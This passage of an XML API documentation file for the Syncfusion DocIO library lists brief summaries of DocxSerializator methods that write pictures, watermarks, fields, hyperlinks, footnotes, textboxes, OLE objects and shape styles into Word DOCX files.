        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeAbsolutePicture(Syncfusion.DocIO.DLS.ParagraphItem)">
            <summary>
            Serializze the absolutely positioned picture.
            </summary>
            <param name="picture"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.GetShapeHorzOrigin(Syncfusion.DocIO.DLS.HorizontalOrigin)">
            <summary>
            Get Shape Horizontal orgin
            </summary>
            <param name="horzOrigin"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.GetHorizOriginAsString(Syncfusion.DocIO.DLS.HorizontalOrigin)">
            <summary>
            Get Shape Horizontal orgin of Fall back
            </summary>
            <param name="horzOrigin"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeInlinePicture(Syncfusion.DocIO.DLS.ParagraphItem)">
            <summary>
            Serialize the inline picture.
            </summary>
            <param name="picture"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeEffectList(System.Collections.Generic.List{Syncfusion.DocIO.DLS.EffectFormat})">
            <summary>
            Serialize Effect List.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeThreeDSceneEffects(Syncfusion.DocIO.DLS.ThreeDFormat)">
            <summary>
            Serialize ThreeD Scene Effects.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeBackdropEffect(Syncfusion.DocIO.DLS.ThreeDFormat)">
            <summary>
            Serialize Backdrop Settings 
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeCameraEffect(Syncfusion.DocIO.DLS.ThreeDFormat)">
            <summary>
            Serialize Camera Settings
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeLightRig(Syncfusion.DocIO.DLS.ThreeDFormat)">
            <summary>
            Serialize Light Rid Effect
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeThreeDShapeEffects(Syncfusion.DocIO.DLS.ThreeDFormat)">
            <summary>
            Serialize ThreeD Shape Effects.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeReflectionEffect(Syncfusion.DocIO.DLS.Reflection)">
            <summary>
            Serialize Reflection Effect.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeShadowEffect(Syncfusion.DocIO.DLS.ShadowFormat)">
            <summary>
            Serialize Shadow Effect.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeWatermark(Syncfusion.DocIO.DLS.Watermark)">
            <summary>
            Serialize the watermark.
            </summary>
            <param name="watermark">The watermark.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeTextWatermark(Syncfusion.DocIO.DLS.TextWatermark)">
            <summary>
            Serialize the text watremark.
            </summary>
            <param name="textWatermark">The text watermark.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializePictureWatermark(Syncfusion.DocIO.DLS.PictureWatermark)">
            <summary>
            Serialize the picture watermark
            </summary>
            <param name="pictWatermark">The picture watermark.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeTextStyleAttribute(Syncfusion.DocIO.DLS.TextWatermark)">
            <summary>
            Prepares the text watermark "style" attribute string.
            </summary>
            <param name="textWatermark">The text watermark.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeField(Syncfusion.DocIO.DLS.WField)">
            <summary>
            Serialize the field
            </summary>
            <param name="field">The field</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeFieldCode(System.String,System.Boolean)">
            <summary>
            Serialize the field code 
            </summary>
            <param name="text">field code</param>
            <param name="isDeletedText">bool to indicate deleted text</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeSafeFieldText(System.String,System.Boolean)">
            <summary>
            Serialize field code
            </summary>
            <param name="inputString">text</param>
            <param name="isDeletedText">bool to indicate deleted text</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.DownloadImage(System.String)">
            <summary>
            Get the image from the url
            </summary>
            <param name="url">Th url</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.UpdateInclPicFieldUrl(System.String,Syncfusion.DocIO.DLS.WField)">
            <summary>
            Update the include picture field url 
            </summary>
            <param name="url"></param>
            <param name="field"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.InsertFieldBegin">
            <summary>
            Inser the field mark begin
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeHyperlink(Syncfusion.DocIO.DLS.WField)">
            <summary>
            Serialize the hyperlink
            </summary>
            <param name="field">The hyperlink field</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeHyperlinkAttributes(Syncfusion.DocIO.DLS.WField)">
            <summary>
            Serialize the hyperlink attributes
            </summary>
            <param name="field"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.WriteLocalReference(Syncfusion.DocIO.DLS.WField)">
            <summary>
            Writes the Local reference attribute
            </summary>
            <param name="field"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.CheckHyperlink(Syncfusion.DocIO.DLS.WField)">
            <summary>
            Check whether the hyperlink is Picture Hyperlink and Text Hyperlink
            </summary>
            <param name="field">The hyperlink field</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.IsSupportedField(Syncfusion.DocIO.FieldType)">
            <summary>
            Returns whether the field is supported or not.
            </summary>
            <param name="fieldType"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeFootEndnote(Syncfusion.DocIO.DLS.WFootnote)">
            <summary>
            Serialize the footnote and endnote.
            </summary>
            <param name="footnote"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeFootEndnotes(System.Boolean)">
            <summary>
            Serialize the endnotes/footnotes
            </summary>
            <param name="IsEndnotes">Is Endnotes</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeFootEndnotesStartElement(System.String,System.String)">
            <summary>
            Serialize start foot/endnotes elements.
            </summary>
            <param name="collTagStr"></param>
            <param name="elemTagStr"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeFootEndnoteElement(Syncfusion.DocIO.DLS.WFootnote,System.Boolean,System.Int32)">
            <summary>
            Serialize footnote/endnote.
            </summary>
            <param name="footnote">The footnote.</param>
            <param name="isEndNote">if it is end note, set to <c>true</c>.</param>
            <param name="id">The id.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeSeqField(Syncfusion.DocIO.DLS.WSeqField)">
            <summary>
            Serialize the seq field.
            </summary>
            <param name="seqField">The Seq field</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeSeqFieldCode(Syncfusion.DocIO.DLS.WSeqField)">
            <summary>
            Serialize the seq field code.
            </summary>
            <param name="seqField"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.GetFieldTextFormat(Syncfusion.DocIO.DLS.TextFormat)">
            <summary>
            Get the field text format.
            </summary>
            <param name="tf"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeDropDownFormField(Syncfusion.DocIO.DLS.WDropDownFormField)">
            <summary>
            Serialize the drop down field.
            </summary>
            <param name="dropDownFormField"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeCheckBoxField(Syncfusion.DocIO.DLS.WCheckBox)">
            <summary>
            Serialize the check box field.
            </summary>
            <param name="checkBox"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeTextFormField(Syncfusion.DocIO.DLS.WTextFormField)">
            <summary>
            Serialize the text form field.
            </summary>
            <param name="textFormField">The textform field.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeFormFieldData(Syncfusion.DocIO.DLS.WFormField)">
            <summary>
            Serialize the form field data
            </summary>
            <param name="field"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeTextboxes(Syncfusion.DocIO.DLS.WTextBoxCollection)">
            <summary>
            Serialize the textboxes
            </summary>
            <param name="textboxes">The textbox collection</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeTextBox(Syncfusion.DocIO.DLS.WTextBox)">
            <summary>
            Serialize the textbox
            </summary>
            <param name="textBox">The textbox</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeFallbackTextDirection(Syncfusion.DocIO.DLS.TextDirection)">
            <summary>
            To Serialize the shape/textbox's text direction
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeFillEffects(Syncfusion.DocIO.DLS.WTextBox)">
            <summary>
            Serialize the fill effects
            </summary>
            <param name="textBox"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeGradientFill(Syncfusion.DocIO.DLS.BackgroundGradient)">
            <summary>
            Serialize the gradient effects.
            </summary>
            <param name="backgroundGradient"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializePictureFill(Syncfusion.DocIO.DLS.WTextBox)">
            <summary>
            Serialize the fill effects.
            </summary>
            <param name="textBox"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializePatternFill(Syncfusion.DocIO.DLS.WTextBox,System.Boolean)">
            <summary>
            Serialize the pattern fill.
            </summary>
            <param name="textBox"></param>
            <param name="isHeaderFooter"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SetIDAttribute(System.IO.Stream,System.String)">
            <summary>
            Set Relationship ID for Stream data
            </summary>
            <param name="reader"></param>
            <param name="writer"></param>
            <param name="relationId"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SetRelationshipIDAttribute(System.Xml.XmlReader,System.Xml.XmlWriter,System.String)">
            <summary>
            Set Relationship ID Attribute
            </summary>
            <param name="reader"></param>
            <param name="writer"></param>
            <param name="relationId"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeTextBoxFormat(System.Boolean,Syncfusion.DocIO.DLS.WTextBoxFormat)">
            <summary>
            Serialize the textbox format.
            </summary>
            <param name="textBoxFormat"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.GetHeightOrigin(Syncfusion.DocIO.DLS.HeightOrigin)">
            <summary>
            Get the vertical Origin of the height in TextBox.
            </summary>
            <param name="rel"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.GetWidthOrigin(Syncfusion.DocIO.DLS.WidthOrigin)">
            <summary>
            Get the horizontal Origin of the width in TextBox.
            </summary>
            <param name="rel"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.GetTextWrappingTypeAsString(Syncfusion.DocIO.DLS.TextWrappingType)">
            <summary>
            Get the textWrapping Type
            </summary>
            <param name="textWrappingType"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.GetTextWrappingStyleAsString(Syncfusion.DocIO.DLS.TextWrappingStyle)">
            <summary>
            Get the textWrapping style
            </summary>
            <param name="textWrappingStyle"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeStroke(Syncfusion.DocIO.DLS.WTextBoxFormat)">
            <summary>
            Serialize the stroke value.
            </summary>
            <param name="textBoxFormat"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.GetDashStyle(Syncfusion.DocIO.LineDashing,System.Boolean)">
            <summary>
            Get the line dashing style.
            </summary>
            <param name="lineDashing"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.GetLineStyle(Syncfusion.DocIO.DLS.TextBoxLineStyle,System.Boolean)">
            <summary>
            Get the line style
            </summary>
            <param name="lineStyle"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeInsetAttribute(Syncfusion.DocIO.DLS.WTextBox)">
            <summary>
            Serialize the inset attribute.
            </summary>
            <param name="textBox"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SkipItem(Syncfusion.DocIO.DLS.ParagraphItem)">
            <summary>
            Check whether to skip the paragraph item while serializing.
            </summary>
            <param name="item"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeXmlParagraphItem(Syncfusion.DocIO.DLS.XmlParagraphItem)">
            <summary>
            Serialize the Xml paragraph item.
            </summary>
            <param name="item"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.ChangeItemRel(Syncfusion.DocIO.DLS.XmlParagraphItem)">
            <summary>
            Change the relation ids in the XmlParagraph Item.
            </summary>
            <param name="item"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.ChangePicRel(Syncfusion.DocIO.DLS.XmlParagraphItem,System.String,System.String)">
            <summary>
            Changes the picture relations.
            </summary>
            <param name="item">The item.</param>
            <param name="oldID">The old ID.</param>
            <param name="newID">The new ID.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.GetXmlItemOwner(Syncfusion.DocIO.DLS.XmlParagraphItem)">
            <summary>
            Get the Xml paragraph item owner.
            </summary>
            <param name="item">The item.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.UpdateHFXmlRels(System.String,Syncfusion.DocIO.DLS.HeaderFooter,System.Collections.DictionaryEntry)">
            <summary>
            Updates the relations for header/footer.
            </summary>
            <param name="newId">The new id.</param>
            <param name="hf">The hf.</param>
            <param name="itemRel">The item rel.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.ChangeIDAttribute(System.IO.Stream,System.Collections.Generic.List{System.String}@,Syncfusion.DocIO.DLS.XmlParagraphItem)">
            <summary>
            Changes the ID attribute in XmlNode.
            </summary>
            <param name="node">The node.</param>
            <param name="array">The array.</param>
            <param name="xmlParaItem">XML Paragraph item</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.ChangeRelationshipIDs(System.Xml.XmlReader,System.Xml.XmlWriter,System.Collections.Generic.List{System.String}@,Syncfusion.DocIO.DLS.XmlParagraphItem)">
            <summary>
            Changes Relationship ID's
            </summary>
            <param name="reader">XML Reader</param>
            <param name="writer">XML Writer</param>
            <param name="relationIds">Relation IDs</param>
            <param name="xmlParaItem">XML Paragraph item</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.ChangeNumId(System.Xml.XmlReader,System.Xml.XmlWriter)">
            <summary>
            Change Num Id
            </summary>
            <param name="reader"></param>
            <param name="writer"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.GetListNumId(System.String)">
            <summary>
            Get List Id
            </summary>
            <param name="styleName"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.ChangeRelationshipIDAttribute(System.Xml.XmlReader,System.Xml.XmlWriter,System.Collections.Generic.List{System.String}@)">
            <summary>
            Changes Relationship ID
            </summary>
            <param name="reader"></param>
            <param name="writer"></param>
            <param name="relationIds"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.ChangeBlipIDAttribute(System.Xml.XmlReader,System.Xml.XmlWriter,System.Collections.Generic.List{System.String}@)">
            <summary>
            Changes Relationship ID for Blip 
            </summary>
            <param name="reader"></param>
            <param name="writer"></param>
            <param name="relationIds"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.ChangeRelationIDAttribute(System.Xml.XmlReader,System.Xml.XmlWriter,System.Collections.Generic.List{System.String}@)">
            <summary>
            Changes Relationship ID for Relation 
            </summary>
            <param name="reader"></param>
            <param name="writer"></param>
            <param name="relationIds"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.ChangeDocPropertyIDAttribute(System.Xml.XmlReader,System.Xml.XmlWriter)">
            <summary>
            Changes Doc Property ID attribute
            </summary>
            <param name="reader"></param>
            <param name="writer"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.ChangeShapeIDAttribute(System.Xml.XmlReader,System.Xml.XmlWriter,Syncfusion.DocIO.DLS.XmlParagraphItem)">
            <summary>
            Changes Shape ID
            </summary>
            <param name="reader">XML Reader</param>
            <param name="writer">XML Writer</param>
            <param name="xmlParaItem">XML Paragraph item</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.UpdateZOrderPosition(System.Xml.XmlReader,Syncfusion.DocIO.DLS.XmlParagraphItem,System.Xml.XmlWriter)">
            <summary>
            Updates the ZOrder position 
            </summary>
            <param name="reader">Current xml reader</param>
            <param name="xmlParaItem">XML Paragraph item</param>
            <param name="writer">XML Writer</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.ChangeDiagID(System.Xml.XmlNode,System.Collections.Generic.List{System.String})">
            <summary>
            Changes the ID attribute in diagram.
            </summary>
            <param name="reader">The reader.</param>
            <param name="array">The array.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.AddXmlItemContType(System.String,System.String)">
            <summary>
            Adds the type of the XML item cont.
            </summary>
            <param name="relType">Type of the rel.</param>
            <param name="relTarget">The rel target.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.UpdateChartInnerRelation(System.String)">
            <summary>
            Updates the chart inner relation.
            </summary>
            <param name="containerName">Name of the container.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeOleObject(Syncfusion.DocIO.DLS.WOleObject)">
            <summary>
            Serialize the ole object.
            </summary>
            <param name="oleObject"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeOleData(Syncfusion.DocIO.DLS.WOleObject,System.String)">
            <summary>
            Serialize the ole data.
            </summary>
            <param name="oleObject"></param>
            <param name="shapeId"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeOlePicture(Syncfusion.DocIO.DLS.WOleObject)">
            <summary>
            Serialize the ole picture.
            </summary>
            <param name="picture"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.WriteLinkOptions">
            <summary>
            Serialize the link options.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.GetOleFileName(Syncfusion.DocIO.DLS.OleObjectType)">
            <summary>
            Gets the name of the file.
            </summary>
            <param name="objectType">Type of the object.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.GetOleRelType(Syncfusion.DocIO.DLS.OleObjectType)">
            <summary>
            Gets the type of the OLE relation.
            </summary>
            <param name="objectType">Type of the object.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.GetOlePictureStyle(Syncfusion.DocIO.DLS.WPicture)">
            <summary>
            Gets the ole picture style.
            </summary>
            <param name="picture"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.UpdateOleContentType(System.IO.Stream)">
            <summary>
            Update the ole content type
            </summary>
            <param name="node"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.UpdateOleContentType(System.String)">
            <summary>
            Updates the content type of OLE object.
            </summary>
            <param name="type">The type.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeSymbol(Syncfusion.DocIO.DLS.WSymbol)">
            <summary>
            Serialize the symbol.
            </summary>
            <param name="symbol"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeFieldMark(Syncfusion.DocIO.DLS.WFieldMark)">
            <summary>
            Serialize the field mark.
            </summary>
            <param name="fieldMark"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializePicture(Syncfusion.DocIO.DLS.WPicture)">
            <summary>
            Serialize the picture.
            </summary>
            <param name="picture"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.IsPictureBullet(Syncfusion.DocIO.DLS.WPicture)">
            <summary>
            Check whether the picture is picturebullet
            </summary>
            <param name="picture">The picture.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeDrawing(Syncfusion.DocIO.DLS.WPicture)">
            <summary>
            Serialize the drawing element.
            </summary>
            <param name="picture">The Picture.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeInlinePicture(Syncfusion.DocIO.DLS.WPicture)">
            <summary>
            Serialize the inline picture.
            </summary>
            <param name="picture"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeAbsolutePicture(Syncfusion.DocIO.DLS.WPicture)">
            <summary>
            Serializze the absolutely positioned picture.
            </summary>
            <param name="picture"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializePicProperties(Syncfusion.DocIO.DLS.WPicture)">
            <summary>
            Serialize the picture properties
            </summary>
            <param name="picture"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeDrawingGraphics(Syncfusion.DocIO.DLS.WPicture)">
            <summary>
            Serialize the graphics element for pictures.
            </summary>
            <param name="picture"></param>
            <param name="multiplier"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeInlineShapeLine(Syncfusion.DocIO.DLS.InlineShapeObject)">
            <summary>
            Serializes the inline shape line.
            </summary>
            <param name="shape">The shape.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.GetLanguage(System.Int16)">
            <summary>
            Sets the language value
            </summary>
            <param name="key"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.GetLineCapStyle(Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.LineCap,System.Boolean)">
            <summary>
            Gets the line cap style.
            </summary>
            <param name="lineCap">The line cap.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.GetLineJoinStyle(Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.LineJoin)">
            <summary>
            Gets the line join style.
            </summary>
            <param name="linejoin">The linejoin.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.GetLineEnd(Syncfusion.DocIO.ArrowheadStyle,System.Boolean)">
            <summary>
            Gets the line end.
            </summary>
            <param name="lineEnd">The line end.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.GetLineEndWidth(Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.LineEndWidth,System.Boolean)">
            <summary>
            Gets the end width of the line.
            </summary>
            <param name="lineEndWidth">End width of the line.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.GetLineEndLength(Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.LineEndLength,System.Boolean)">
            <summary>
            Gets the end length of the line.
            </summary>
            <param name="lineEndLength">End length of the line.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeShapeLine(Syncfusion.DocIO.DLS.InlineShapeObject)">
            <summary>
            Serializes the shape line.
            </summary>
            <param name="shape">The shape.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeGradientFill(Syncfusion.DocIO.DLS.GradientFill)">
            <summary>
            Serializes the gradient fill.
            </summary>
            <param name="gradientFill">The gradient fill.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeGradientStop(Syncfusion.DocIO.DLS.GradientStop)">
            <summary>
            Serializes the gradient stop.
            </summary>
            <param name="gradientStop">The gradient stop.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.GetFlipOrientation(Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.FlipOrientation)">
            <summary>
            Gets the flip orientation.
            </summary>
            <param name="flip">The flip.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.GetGradientShadeType(Syncfusion.DocIO.DLS.GradientShadeType)">
            <summary>
            Gets the type of the gradient shade.
            </summary>
            <param name="shade">The shade.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializePictureHyperlink(Syncfusion.DocIO.DLS.WPicture)">
            <summary>
            Serialize the picture hyperlink.
            </summary>
            <param name="picture"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.UpdateShapeId(Syncfusion.DocIO.DLS.WPicture,System.Boolean,Syncfusion.DocIO.DLS.WOleObject)">
            <summary>
            Update the shape id.
            </summary>
            <param name="pic"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.AddImageRelation(System.Collections.Generic.Dictionary{System.String,Syncfusion.DocIO.DLS.ImageRecord},Syncfusion.DocIO.DLS.ImageRecord)">
            <summary>
            Adds the image relation.
            </summary>
            <param name="imageCollection">The image collection.</param>
            <param name="imageRecord">The image record.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.UpdateHFImageRels(System.String,Syncfusion.DocIO.DLS.HeaderFooter,Syncfusion.DocIO.DLS.ImageRecord)">
            <summary>
            Update the HeaderFooter image relations.
            </summary>
            <param name="id"></param>
            <param name="hf"></param>
            <param name="image"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.UpdateHFImageRels(Syncfusion.DocIO.DLS.HeaderFooter,Syncfusion.DocIO.DLS.WPicture)">
            <summary>
            Update the HeaderFooter image relations.
            </summary>
            <param name="hf"></param>
            <param name="image"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.GetHeaderFooterId(Syncfusion.DocIO.DLS.HeaderFooter)">
            <summary>
            Get the header footer id.
            </summary>
            <param name="hf"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.GetPictureOwner(Syncfusion.DocIO.DLS.WPicture)">
            <summary>
            Get the picture owner.
            </summary>
            <param name="pic"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.GetOleObjectOwner(Syncfusion.DocIO.DLS.WOleObject)">
            <summary>
            
            </summary>
            <param name="oleObject"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeShape(Syncfusion.DocIO.DLS.WPicture)">
            <summary>
            Serialize the shape.
            </summary>
            <param name="picture"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SetCroppingValue(System.Single)">
            <summary>
            Set the crop value
            </summary>
            <param name="offset"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeShapeBorderColor(Syncfusion.DocIO.DLS.InlineShapeObject)">
            <summary>
            Serializes the color of the shape border.
            </summary>
            <param name="shape">The shape.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeStrokeProps(Syncfusion.DocIO.DLS.InlineShapeObject)">
            <summary>
            Serializes the stroke props.
            </summary>
            <param name="shape">The shape.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.GetStrokeLineStyle(Syncfusion.DocIO.DLS.TextBoxLineStyle)">
            <summary>
            Gets the stroke line style.
            </summary>
            <param name="lineStyle">The line style.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.GetStrokeDashStyle(Syncfusion.DocIO.LineDashing)">
            <summary>
            Gets the stroke dash style.
            </summary>
            <param name="lineDashing">The line dashing.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeWrapping(Syncfusion.DocIO.DLS.TextWrappingStyle,Syncfusion.DocIO.DLS.TextWrappingType)">
            <summary>
            Serialize the text wrapping style.
            </summary>
            <param name="wrapStyle"></param>
            <param name="wrapType"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeWrapPolygon(Syncfusion.DocIO.DLS.Entity,Syncfusion.DocIO.DLS.WrapPolygon)">
            <summary>
            Serializes the wrap polygon.
            </summary>
            <param name="entity">The entity.</param>
            <param name="wrapPolygon">The wrap polygon.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.AdjustPolygonPoints(System.Collections.Generic.List{System.Drawing.PointF})">
            <summary>
            Adjusts the polygon points.
            </summary>
            <param name="wrapPolygon">The wrap polygon.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.GetWrappingStyleAsString(Syncfusion.DocIO.DLS.TextWrappingStyle)">
            <summary>
            Get the text wrapping style.
            </summary>
            <param name="wrapStyle"></param>
            <returns></returns>
        </member>
